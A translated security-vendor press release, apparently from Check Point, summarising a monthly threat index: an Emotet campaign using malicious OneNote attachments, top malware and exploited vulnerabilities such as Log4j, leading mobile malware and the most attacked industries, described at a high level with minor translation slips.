Last month, security researchers uncovered a new malware campaign from the notorious Emotet Trojan. As reported earlier this year, since Microsoft announced it would block macros in Office files, Emotet attackers have been looking for alternative ways to proliferate malicious files.
In the most recent campaign, the attackers have chosen a new strategy: they send spam emails that contain a malicious OneNote file. Once opened, a fake message appears, tricking the victim into clicking on the document, thereby downloading the Emotet infection. Once installed, the malware can collect email user credentials such as login credentials and contact information. Attackers then use the information gathered to extend the reach of the campaign and facilitate future attacks.
bypassed security measures
Maya Horowitz, VP Research at Check Point Software, on the latest Global Threat Index: "Although large technology companies do their best to take down cybercriminals as early as possible, it is almost impossible to prevent every attack that fails security measures bypasses We know that Emotet is a sophisticated Trojan, and it's no surprise that it managed to bypass Microsoft's new defenses. The most important thing people can do is ensure proper email security, avoid downloading unexpected files, and be very skeptical about the origin of an email and its content.”
Malware Top 3 in Germany:
The arrows refer to the change in ranking compared to the previous month.
- ↔ Qbot – Qbot, also known as Qakbot, is a banking Trojan that first appeared in 2008. It is designed to steal a user's banking information and keystrokes. Commonly distributed via spam emails, Qbot uses multiple anti-VM, anti-debugging, and anti-sandbox techniques to complicate analysis and evade detection.
- ↑ Guloader – Guloader is a downloader that has been widely used since December 2019. When it first appeared, Guloader was used to download Parallax RAT, but also other remote access Trojans and info-stealers, such as Netwire, Formbook, and Agent Tesla.
- ↑ Emotet – Emotet is an advanced, self-propagating and modular trojan horse that was once used as a banking trojan and currently proliferates other malware or malicious campaigns. Emotet uses multiple persistence methods and evasion techniques to avoid detection and can be distributed via phishing spam emails with malicious attachments or links.
Top 3 vulnerabilities:
In March, Apache Log4j Remote Code Execution was the top exploited vulnerability, affecting 44 percent of organizations worldwide, closely followed by HTTP Headers Remote Code Execution with a 43 percent share. MVPower DVR Remote Code Execution ranks third with a global impact of 40 percent.
- ↑ Apache Log4j Remote Code Execution (CVE-2021-44228) - A remote code execution vulnerability exists in Apache Log4j. Successful exploitation of this vulnerability could allow a remote attacker to run arbitrary code on the affected system.
- ↑ HTTP Headers Remote Code Execution (CVE-2020-10826,CVE-2020-10827,CVE-2020-10828,CVE-2020-13756) - HTTP headers allow the client and server to pass additional information with an HTTP request. An attacker can use a vulnerable HTTP header to execute arbitrary code on the victim's machine.
- ↑ MVPower DVR Remote Code Execution - Remote code execution vulnerability exists in MVPower DVR devices. An attacker can exploit this vulnerability to execute arbitrary code on the affected router via a manipulated request.
Top 3 Mobile Malware:
Over the past month, AhMynth was the most prevalent Hadny malware, followed by Anubis and Hiddad.
- ↑ AhMyth – AhMyth is a Remote Access Trojan (RAT) discovered in 2017. It is distributed via Android apps found in app stores and various websites. When a user installs one of these infected apps, the malware can collect sensitive information from the device and perform actions like keylogging, taking screenshots, sending SMS messages, and activating the camera
- ↓ Anubis – Anubis is a banking Trojan developed for Android phones. Since its initial detection, it has gained additional features including remote access trojan (RAT), keylogger and audio recording capabilities, and various ransomware functions. It has been spotted in hundreds of different applications on the Google Store.
- ↓ Hiddad - Hiddad is an Android malware that repackages legitimate apps and then publishes them to a third-party store. Its main function is to display advertisements, but it can also gain access to important operating system security details.
Attacked industries:
- ↑ retail/wholesaleel (retail/wholesale
- ↓ Education/Research (education/research)
- ↔ Health services (Healthcare)
Check Point's Global Threat Impact Index and ThreatCloud Map are powered by Check Point's ThreatCloudIntelligence. ThreatCloud provides real-time threat intelligence derived from hundreds of millions of sensors worldwide across networks, endpoints and mobile phones. This intelligence is enriched with AI-based engines and exclusive research data from Check Point Research, the research and development department of Check Point Software Technologies.
More at Checkpoint.com
About check point Check Point Software Technologies GmbH (www.checkpoint.com/de) is a leading provider of cybersecurity solutions for public administrations and companies worldwide. The solutions protect customers from cyberattacks with an industry leading detection rate for malware, ransomware and other types of attacks. Check Point offers a multi-level security architecture that protects company information in cloud environments, networks and on mobile devices, as well as the most comprehensive and intuitive “one point of control” security management system. Check Point protects over 100.000 businesses of all sizes.